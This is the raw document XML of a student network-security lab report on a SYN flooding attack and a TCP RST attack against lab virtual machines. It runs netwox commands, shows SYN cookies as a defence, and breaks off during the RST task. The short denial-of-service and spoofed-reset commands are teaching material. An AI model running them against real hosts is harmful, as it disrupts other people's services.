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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CPS 633 - Lab 3 Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 4 Group 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 1: SYN Flooding Attack</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First we set up three VMs: the Client (10.0.2.4), the Server (10.0.2.5) and the Attacker (10.0.2.6).</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Then we telnet to the Server from the Client to check if the connection is established.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ telnet 10.0.2.5 </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t xml:space="preserve">We check if the cookies are set on the Server machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo sysctl -a | grep cookie</w:t>
      </w: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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5300663" cy="1945275"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10"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300663" cy="1945275"/>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t xml:space="preserve">Since </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">net.ipv4.tcp_syncookies = 0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it means that the SYN cookie is turned off and now our SYN flooding attack will be effective.</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t xml:space="preserve">Then we check the half-open connections on the Server by using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -tna</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2641600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="15"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94360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t xml:space="preserve">We can see that most of the states are </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LISTEN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which means that they are waiting for a TCP connection and one is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ESTABLISHED </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP connection. There are no half-open connections because none of the states are </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SYN_RECV</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ESTABLISHED </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP connection was from the telnet we did at the beginning from the Client to Server.</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t xml:space="preserve">Now we can proceed with the SYN flooding attack. To do this, we first send out a large quantity of packets from a random source IP address. We use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netwox</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, specifically </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Synflood </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Tool 76) to conduct the attack. For the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netwox</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command we use the IP address of the Server (10.0.2.5) as the destination IP address and set the destination port as 23.</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t xml:space="preserve">On the Attacker machine we use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo netwox 76 -i 10.0.2.5 -p 23</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t xml:space="preserve">Then we check the connections on the Server machine again using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -tna</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4203700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9"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5943600" cy="42037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t xml:space="preserve">We can see that this is very different from the first time we did </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -tna</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Now there are a lot more half-open connections indicated by the state </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SYN_RECV</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Each of the half-open connections has a random source IP address and a destination IP address of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.0.2.5:23</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </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t xml:space="preserve">A SYN flood attack floods the Server’s queue that is used for half-open connections and when the queue is full the Server will not be able to accept any more connections. We can check the size of the queue by using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo sysctl -q net.ipv4.tcp_max_syn_backlog</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="990600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21" name="image19.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image19.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="9906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t xml:space="preserve">So, when the queue has 128 half-open connections it can not take any more connections. </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t xml:space="preserve">To prove that the attack was successful, we will fill up the queue with half-open connections from the attack and then </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">telnet </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to the Server from the Client machine. If the Client machine can not establish a connection with the Server, it would mean that the attack was successful.</w:t>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t xml:space="preserve">We try to connect with the Server using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">telnet 10.0.2.5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1663700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="12" name="image18.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image18.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="16637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t xml:space="preserve">When we attempt to connect to the Server, the connection timed out because the Server’s queue was full from the attack and was unable to accept any more connections.</w:t>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t xml:space="preserve">Next, we ran our attacks with the SYN cookie mechanism turned on. To enable this cookie, we run the following command on the Server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo sysctl -w net.ipv4.tcp_syncookies=1</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="889000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2"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943600" cy="8890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t xml:space="preserve">This time when we ran the attacks again with the SYN cookie mechanism, the Server still had a lot of half-open connections.</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5617458" cy="3662363"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8" name="image15.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image15.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5617458" cy="3662363"/>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t xml:space="preserve">However, this time when we </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">telnet 10.0.2.5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> we could establish the connection from the Client to the Server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5157788" cy="3402365"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13"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5157788" cy="3402365"/>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t xml:space="preserve">The SYN cookie can effectively protect the machine against SYN flooding attack because it does not set aside resources unless the final ACK packet is received. Since the flood attack only sends a large number of SYN packets, they will be ignored by the receiver’s machine. Its queue will not fill up and is able to establish a connection with the Client machine.</w:t>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b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 2: TCP RST Attacks on telnet and ssh Connections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker: 10.0.2.12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim: 10.0.2.13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Observer: 10.0.2.14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First we establish the telnet connection from Victim to Observer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">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telnet 10.0.2.14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">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46">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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5205413" cy="3727026"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3"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205413" cy="3727026"/>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48">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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2133600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7"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5943600"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rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we execute the TCP RST attack command: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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sudo netwox 78 --device “Eth0” --filter “host 10.0.2.14” --spoofip “raw” --ips 10.0.2.13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">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4F">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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="558800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4"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5943600" cy="5588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51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upon observation we see that the attack is successful in sending the TCP RST packets from the spoofed IP address. We see it in both the terminal and in Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
